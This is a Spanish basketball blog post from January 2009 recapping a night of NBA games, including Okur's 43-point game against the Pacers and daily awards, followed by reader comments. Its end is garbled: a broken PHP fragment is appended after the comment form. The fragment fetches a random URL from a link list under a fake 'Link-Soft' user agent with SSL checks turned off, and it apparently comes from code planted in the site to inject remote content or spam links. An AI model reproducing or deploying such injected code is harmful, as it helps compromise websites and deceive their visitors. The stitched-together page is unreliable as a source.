La crónica (12/1/2009)

13 de January de 2009 por txusma

Por Txusma & Magic32

Si yo fuera Danny Granger empezaría a pensar que me ha lanzado un mal de ojo. Noche tras noche Granger realiza un partido soberbio, postulándose como claro favorito a estar en el All-Stars de Phoenix y noche tras noche los Pacers pierden por menos de 8 puntos. Atentos a los datos: de los últimos 9 partidos perdidos tan sólo 1 lo ha sido por más de esa diferencia. La única manera de consolarse es pensar que de cada derrota se aprende alguna cosa. Anoche, Okur se disfrazó de killer y con 48 puntos y la ayuda de Kirilenko y Deron, autores de los últimos 15 puntos de los Jazz, endosó a los Pacers una rayita más en su funesta estadística. Ni las bajas de Millsap y Boozer lo evitaron. En los Pacers nuevo partidazo de Granger, correcto de Dunleavy y la pregunta de si el papel de Marquis Daniels es más importante de lo que parece a simple vista. Con esta victoria Utah encadena 4 consecutivas.

Los Celtics volvieron a ganar a Toronto pero esta vez en la prórroga en un partido que no pudo contar con la presencia de Calderón que se resintió un poco de su lesión y prefirió no arriesgar. Esta vez Pierce y Garnett estuvieron muy finos y fue más que suficiente para tumbar a los canadienses. Portland, por su parte, ganó de manera holgada a unos Bulls que pudieron contar con toda su plantilla por primera vez en mucho tiempo. Ni por esas. Con Roy y Lamarcus missing fueron Greg Oden y sobretodo Travis Outlaw los que tumbaron a unos débiles toritos por los que casi nadie apuesta para Playoffs.

Además en esa lucha ayer ganaron 2 rivales directos, Bucks y Nets, frente Wizards y Thunder, respectivamente. Ninguno de los 2 partidos fue tan fácil para los equipos favoritos como se preveía en un principio y ambos tuvieron que sudar bien la victoria. En los Nets, Carter y Harris recibieron la inestimable ayuda de Brook López que cuajó un maravilloso partido. Por contra el chino Yi Jianlian, que estaba realizando una buena temporada, se ha lesionado para 6 semanas.

Y para acabar la sorpresa de la noche: Los Knicks tumbaron a unos Hornets horrorosos en su casa. Con esta irregularidad no se puede ir a ninguna parte…

PREMIOS

MVP: Ni Granger (30 puntos, 7 asistencias, 2 tapones). Ni Outlaw (33 puntos, 7 rebotes, 3 tapones). Ni Brook Lopez (31 puntos, 13 rebotes, 2 tapones). Ni siquiera Pierce (39 puntos, 9 rebotes, 4 asistencias). El MVP de la noche fue Mehmet Okur, autor de 43 puntos, con 13 de 19 en tiros de campo y 14 de 15 en libres, además de 9 rebotes y 3 asistencias en 40 minutos de juego.

El rookie: Lo hemos mencionado entre los candidatos al MVP de la jornada y sin duda es nuestro rookie del día. Brook Lopez anotó 31 puntos con 10 de 17 en tiros de campo y 11 de 12 en libres, además de atrapar 13 rebotes y colocar 2 tapones ante los Thunder.

La sorpresa: Ukic anotó 16 puntos, con 7 de 12 en tiros, además de 3 rebotes, 3 asistencias y 2 robos, en la derrota de su equipo en Boston. Nada mal para alguien que no valía para la ACB…

La decepción: Pocos partidos ganaban los Wizards con Caron Butler a un gran nivel, y menos aún con partidos como el que hizo ayer el alero. Falló 11 de sus 13 tiros y no repartió ninguna asistencia en más de 37 minutos.

El mayor esfuerzo en vano: Drew Gooden acostumbra a aparecer por aquí y anoche volvió a hacer méritos con 22 puntos, 9 rebotes y 2 tapones. También Nick Young, que anotó 30 puntos en 32 minutos. O Andrea Bargnani, que sigue en racha y se fue a los 23 puntos, 8 rebotes y 3 asistencias en Boston, además de anotar el triple para forzar la prórroga. O, por supuesto, Danny Granger y sus 30 puntos, 7 asistencias y 2 tapones en Utah.

La pregunta del día: Andrew Bynum, Brook López, Greg Oden, Spencer Hawes, Kosta Koufos, Marc Gasol… ¿Volverán los tiempos de los grandes pívots?

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Lo de Granger es brutal. Pero madre de dios, vaya partido de Okur. Aunque parece quienes lo ganaron al final fueron Deron y AK.

    Sobre la pregunta del día, dos palabras: Andrew Bynum.

      Citar

  2. Txusma dice:
    #2

    Dios mio! Mira que olvidarme de Bynum. Voy a editar el articulo…

      Citar

  3. Viva_Dirk dice:
    #3

    Si, puede que salgan algunos muy buenos centers, además de los que ya hay consagrados como D.Howard, Yao o Biedrins.

    Estan surgiendo algunos jugadores que recuerdan viejos tiempos, pivots aparte.

      Citar

  4. xapa_croack dice:
    #4

    Si son 6 semanitas para el chino, entonces nos quedamos sin all star, una baja sensible para la armada amarilla.

      Citar

  5. Txusma dice:
    #5

    Un favor para el resto del mundo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>